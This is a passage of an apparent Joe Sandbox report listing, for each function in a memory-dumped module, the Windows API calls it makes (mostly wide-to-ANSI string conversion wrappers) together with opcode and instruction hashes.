                                                                                                                                                                    • Instruction Fuzzy Hash: 2A2110B5900209FFDB14DF98C949BAEBBB5FB48301F104219FA15A7280D7F19A80DB94
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB32B9D
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB32BAD
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • newMultiByteFromWideCharSize.FONDUE(00000000,?), ref: 5BB32BCC
                                                                                                                                                                    • GetDateFormatA.KERNEL32(00000000,00000000,?,00000000,00000000,?), ref: 5BB32BF7
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,?), ref: 5BB32C1E
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB32C2E
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB32C3E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                     • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$From$FreeGlobal$DateErrorFormatLastSize
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4159601105-0
                                                                                                                                                                    • Opcode ID: 08537d5dbb77858840881d1369c1337191a989242bb33f8ddc2fe772082b89eb
                                                                                                                                                                    • Instruction ID: d56b9f61a63688724d7fd1a84db1c3163be83414f68e3df09ecfaac852bac220
                                                                                                                                                                    • Opcode Fuzzy Hash: 08537d5dbb77858840881d1369c1337191a989242bb33f8ddc2fe772082b89eb
                                                                                                                                                                    • Instruction Fuzzy Hash: 2D21F4B1900208EFDF15DF94C889BDEBBB9FB48301F108558E510A7280D7F99A84DFA5
                                                                                                                                                                    APIs
                                                                                                                                                                    • WinHelpW.USER32(?,?,?,?), ref: 5BB37817
                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 5BB37826
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB37840
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 5BB3785F
                                                                                                                                                                    • WinHelpA.USER32(?,?,?,?), ref: 5BB37878
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 5BB37893
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 5BB378A0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharGlobalHelpMultiWide$AllocFreelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2086232016-0
                                                                                                                                                                    • Opcode ID: ba24292599b7b14521add45d14bf796316ae49e153f4845277edf373ab677d73
                                                                                                                                                                    • Instruction ID: dd8ffd12c12e0dc28f470cb205553c33ba8604dc2afefe411336d75df91c50c7
                                                                                                                                                                    • Opcode Fuzzy Hash: ba24292599b7b14521add45d14bf796316ae49e153f4845277edf373ab677d73
                                                                                                                                                                    • Instruction Fuzzy Hash: C8210CB6A00109BFDB04DF98C844FAF77B9FB48710F108219FA19A7284D7B1E940DB65
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadIconW.USER32(?,?), ref: 5BB387CF
                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 5BB387F5
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB3880F
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 5BB3882E
                                                                                                                                                                    • LoadIconA.USER32(?,00000000), ref: 5BB38847
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB38863
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: GlobalIconLoad$AllocByteCharFreeMultiWidelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1819427946-0
                                                                                                                                                                    • Opcode ID: e4f5fa51340c2dae22360ea363990daaa42bbfcbe0bc9af3485c43681712bef2
                                                                                                                                                                    • Instruction ID: 93b27215f3b7c86335d313cc3d84cc23f256533cc14e065162daa3ccf44e39c8
                                                                                                                                                                    • Opcode Fuzzy Hash: e4f5fa51340c2dae22360ea363990daaa42bbfcbe0bc9af3485c43681712bef2
                                                                                                                                                                    • Instruction Fuzzy Hash: 9D21F9B5A00109BFDB04DF98C944BBEB7B6FB48710F108229F919A7284D6B1DA41DB65
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 5BB44392
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 5BB443BB
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 5BB443DA
                                                                                                                                                                    • CreateWindowStationA.USER32(?,?,?,?), ref: 5BB443F3
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 5BB4440E
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 5BB4441B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharGlobalMultiWide$AllocCreateFreeStationWindowlstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 61863157-0
                                                                                                                                                                    • Opcode ID: 77be3c7843cc1d91420ef63c686bf0ca9697a30c1c42bed64eaf4fb4d6358594
                                                                                                                                                                    • Instruction ID: bd7cb8753f40c03d1de7eeedb3e492252aff23a24105829c0778da8e66c0cc8d
                                                                                                                                                                    • Opcode Fuzzy Hash: 77be3c7843cc1d91420ef63c686bf0ca9697a30c1c42bed64eaf4fb4d6358594
                                                                                                                                                                    • Instruction Fuzzy Hash: C72100B5A00209BFDB00DFD8C845FAFBBB5FB48710F108219FA15A7284D7B19A40DBA5
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 5BB43C00
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 5BB43C29
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 5BB43C48
                                                                                                                                                                    • GetKeyboardLayoutNameA.USER32(?), ref: 5BB43C55
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 5BB43C70
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 5BB43C7D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharGlobalMultiWide$AllocFreeKeyboardLayoutNamelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1703440718-0
                                                                                                                                                                    • Opcode ID: a808f8f051319b81cd8f454bac250635642461f678f64b8cb99e98d01af297f0
                                                                                                                                                                    • Instruction ID: 277953bbfa3e2fb64ebdab68ab80a5375c8f22e91708d3d33aa31a757827fadf
                                                                                                                                                                    • Opcode Fuzzy Hash: a808f8f051319b81cd8f454bac250635642461f678f64b8cb99e98d01af297f0
                                                                                                                                                                    • Instruction Fuzzy Hash: 0011FEB5900609BFDB00DFD8C845BBEBBB5FB48700F104219FA15A7284C6B19A40DBA5
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB3BBC7
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BBD7
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BBF4
                                                                                                                                                                    • GetProfileIntA.KERNEL32(00000000,00000000,?), ref: 5BB3BC13
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3BC26
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3BC36
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$FreeGlobal$ErrorLastProfile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3090023961-0
                                                                                                                                                                    • Opcode ID: 52afdf9915e8b243ec405ab6aae1891e4d7bd9f2b5e7096e478a0b0e9909bcca
                                                                                                                                                                    • Instruction ID: 0cc18e00ffacb26c8ec14454df6978653983d53d37e2a9a17befb549158f8e60
                                                                                                                                                                    • Opcode Fuzzy Hash: 52afdf9915e8b243ec405ab6aae1891e4d7bd9f2b5e7096e478a0b0e9909bcca
                                                                                                                                                                    • Instruction Fuzzy Hash: D21106B5D00208EFDB21DFA4C448B9EB7B4FB04305F54C069E415AB284DBFA9A84EF55
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB3D804
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3D814
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3D831
                                                                                                                                                                    • CopyFileA.KERNEL32(00000000,00000000,?), ref: 5BB3D850
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3D863
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3D873
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$FreeGlobal$CopyErrorFileLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4228768975-0
                                                                                                                                                                    • Opcode ID: f9ec435e2ce9b86f9b62f2669374f881163214e5d94240050c2bf3eeb21d168a
                                                                                                                                                                    • Instruction ID: 886fe1ae14417d56e99421c5aedeea24c52fdf46f82f677d89d488809bb987a4
                                                                                                                                                                    • Opcode Fuzzy Hash: f9ec435e2ce9b86f9b62f2669374f881163214e5d94240050c2bf3eeb21d168a
                                                                                                                                                                    • Instruction Fuzzy Hash: 8A1106B5D00208EFDB00EFE9D849B9DBBB5FB44305F108069E415A7280D7BAA684DF45
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB3E01A
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3E02A
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3E047
                                                                                                                                                                    • OpenBackupEventLogA.ADVAPI32(00000000,00000000), ref: 5BB3E062
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3E075
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3E085
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$FreeGlobal$BackupErrorEventLastOpen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2071961401-0
                                                                                                                                                                    • Opcode ID: 085f1ba403e277487cc99644af47a76e16b2c88edc31be117e518147abacaeec
                                                                                                                                                                    • Instruction ID: 089eeccd11800b75f8aabc9222abd28de41ed427cff8680862ed34ef72e94277
                                                                                                                                                                    • Opcode Fuzzy Hash: 085f1ba403e277487cc99644af47a76e16b2c88edc31be117e518147abacaeec
                                                                                                                                                                    • Instruction Fuzzy Hash: E511A8B5D00608EFDB01DFA0C489B9EBBB5FB44305F10C16AE51567280D7BA9688DF65
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 5BB45820
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB45849
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000), ref: 5BB45868
                                                                                                                                                                    • LoadAcceleratorsA.USER32(?,00000000), ref: 5BB45881
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB4589E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Global$AcceleratorsAllocByteCharFreeLoadMultiWidelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 400132532-0
                                                                                                                                                                    • Opcode ID: 4e59ff09fb01961328fd57a931eccaa1b17ecd2a86f01085c0e440ee42880f41
                                                                                                                                                                    • Instruction ID: ad74f234e903fc789b55ad721387536bd442797cd2904f27944159c741214287
                                                                                                                                                                    • Opcode Fuzzy Hash: 4e59ff09fb01961328fd57a931eccaa1b17ecd2a86f01085c0e440ee42880f41
                                                                                                                                                                    • Instruction Fuzzy Hash: A7211FB5D00609AFDB00DF98C945BAEB7B6FF48310F108229F914A7284D7B5DA40DB95
                                                                                                                                                                    APIs
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB417C7
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB417E4
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB4182E
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB4183E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$FreeGlobal
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 871221524-0
                                                                                                                                                                    • Opcode ID: a925a881af3f388989389ed37b5183020163956da876000de3ded98ad012239d
                                                                                                                                                                    • Instruction ID: 1ae71789a9cb1ea12a4241843aff322efca2ec314a3b020ee4ddd5cdfee1e37a
                                                                                                                                                                    • Opcode Fuzzy Hash: a925a881af3f388989389ed37b5183020163956da876000de3ded98ad012239d
                                                                                                                                                                    • Instruction Fuzzy Hash: D121B3B6D00208EFCB04DF94D888BDEBBBABB48305F108158E915A7240D7B9DA94DF95
                                                                                                                                                                    APIs
                                                                                                                                                                    • wcslen.MSVCRT ref: 5BB3A7A6
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB3A7C3
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 5BB3A7E2
                                                                                                                                                                    • _hwrite.KERNEL32(?,?,?), ref: 5BB3A7F7
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 5BB3A804
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Global$AllocByteCharFreeMultiWide_hwritewcslen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 762335071-0
                                                                                                                                                                    • Opcode ID: 9131b15ab121e49c467aa068c49594242a4f361871abc940b031741a961120e8
                                                                                                                                                                    • Instruction ID: b03e362f488cdfb2104fe771e046c6ed355965b0ed0093c9026cd7edc0c6cb8e
                                                                                                                                                                    • Opcode Fuzzy Hash: 9131b15ab121e49c467aa068c49594242a4f361871abc940b031741a961120e8
                                                                                                                                                                    • Instruction Fuzzy Hash: 7701E1B6A00209BFDB04DFD8C845FAE77B9FB48710F108159FA15A7284D6B1AA40DB65
                                                                                                                                                                    APIs
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB3A05E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                                    • Opcode ID: 5431e8108b7e93c7ad38ed47ebdae5d701bb2b3d588510476a1ed689d606d3e9
                                                                                                                                                                    • Instruction ID: 255683c25f877bb5b72b13642e11f88edc45d41198cb997393b3544e1fd069f6
                                                                                                                                                                    • Opcode Fuzzy Hash: 5431e8108b7e93c7ad38ed47ebdae5d701bb2b3d588510476a1ed689d606d3e9
                                                                                                                                                                    • Instruction Fuzzy Hash: E33160F2900608EFDB00DF94D849BEEB7B4FB48720F204219F514A7280D7B59940CBA9
                                                                                                                                                                    APIs
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(-0000001C), ref: 5BB3FC83
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • strcpy.MSVCRT(?,00000000), ref: 5BB3FC9E
                                                                                                                                                                    • EnumFontFamiliesExA.GDI32(?,00000000,?,?,?), ref: 5BB3FCC9
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3FCDC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$EnumFamiliesFontFreeGlobalstrcpy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1671893373-0
                                                                                                                                                                    • Opcode ID: d35c7c09c1714d070b7953d9925b134b498eadf9c54b4d2299f7acc0b82129ce
                                                                                                                                                                    • Instruction ID: 4d88250204f5786ec1b3f35cda37dab9b7011068fff311d264c040113ae70f4e
                                                                                                                                                                    • Opcode Fuzzy Hash: d35c7c09c1714d070b7953d9925b134b498eadf9c54b4d2299f7acc0b82129ce
                                                                                                                                                                    • Instruction Fuzzy Hash: BA412CB9A04288EFCB05CFA8C490ADDBBB1FF59310F14C159EC59AB342C670EA45CB65
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetWindowTextLengthW.USER32(?), ref: 5BB37C11
                                                                                                                                                                    • GetWindowTextLengthA.USER32(?), ref: 5BB37C1D
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB37C30
